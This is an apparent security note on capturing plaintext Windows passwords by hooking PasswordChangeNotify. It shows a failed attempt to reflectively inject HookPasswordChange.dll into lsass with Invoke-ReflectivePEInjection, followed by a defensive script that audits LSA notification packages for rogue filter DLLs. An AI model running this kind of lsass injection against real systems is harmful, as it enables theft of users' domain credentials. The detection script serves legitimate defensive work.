A Windows password filter DLL: once it is installed, it intercepts the plaintext password a user enters when changing their password and saves it locally.
The underlying mechanism: in Active Directory, when a user enters a new password, the password is checked against the complexity requirements; if it passes, the LSA calls the PasswordChangeNotify function in rassfm.dll to synchronize the password across the system.
The Hook PasswordChangeNotify attack hijacks this flow to obtain the plaintext password.
1. Hook PasswordChangeNotify attack
PS C:\Users\Administrator.SEC\Downloads> Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass
Specified cast is not valid.
At C:\Users\Administrator.SEC\Downloads\Invoke-ReflectivePEInjection.ps1:2384 char:7
+ if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_D ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : OperationStopped: (:) [], InvalidCastException
+ FullyQualifiedErrorId : System.InvalidCastException
PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)
At C:\Users\Administrator.SEC\Downloads\Invoke-ReflectivePEInjection.ps1:2434 char:4
+ Throw "PE platform doesn't match the architecture of the ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : OperationStopped: (PE platform doe...d in (32/64bit):String) [], RuntimeException
+ FullyQualifiedErrorId : PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)
Failed in a Windows Server 2016 environment.
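The password filter mechanism described above is loaded through the LSA "Notification Packages" registry value, so a persistent installation of a filter like this one has to appear there. The following audit script is an added example, not code from the original post or from the HookPasswordChange project; the baseline list (rassfm and scecli) is an assumption about a default domain controller and should be replaced with what your own build image ships.

```powershell
# Added example (not from the original post): audit the LSA "Notification Packages" value,
# which names the password filter DLLs that lsass loads and calls PasswordChangeNotify on.
# Assumed baseline for a default domain controller; adjust to your own gold image.
$Baseline = @('rassfm', 'scecli')
$LsaKey   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Get-PasswordFilterAudit {
    param([string[]]$Expected = $Baseline)

    # REG_MULTI_SZ comes back as a string array, one module name per entry.
    $packages = (Get-ItemProperty -Path $LsaKey -Name 'Notification Packages').'Notification Packages'

    foreach ($name in $packages) {
        # Entries are module names without extension, resolved from System32 by LSA.
        $path = Join-Path $env:SystemRoot "System32\$name.dll"
        if (Test-Path $path) {
            # System DLLs are catalog-signed; Get-AuthenticodeSignature consults the catalog too.
            $sig = (Get-AuthenticodeSignature -FilePath $path).Status
        } else {
            $sig = 'FileMissing'
        }
        $known = $Expected -contains $name

        [pscustomobject]@{
            Name       = $name
            Path       = $path
            InBaseline = $known
            Signature  = $sig
            # Flag anything outside the baseline or not carrying a valid signature for review.
            Suspicious = (-not $known) -or ($sig -ne 'Valid')
        }
    }
}

Get-PasswordFilterAudit | Format-Table -AutoSize
```

Run it with local administrator rights on each domain controller; an unexpected or unsigned entry is worth pulling the DLL for analysis, since LSA will load it on the next boot.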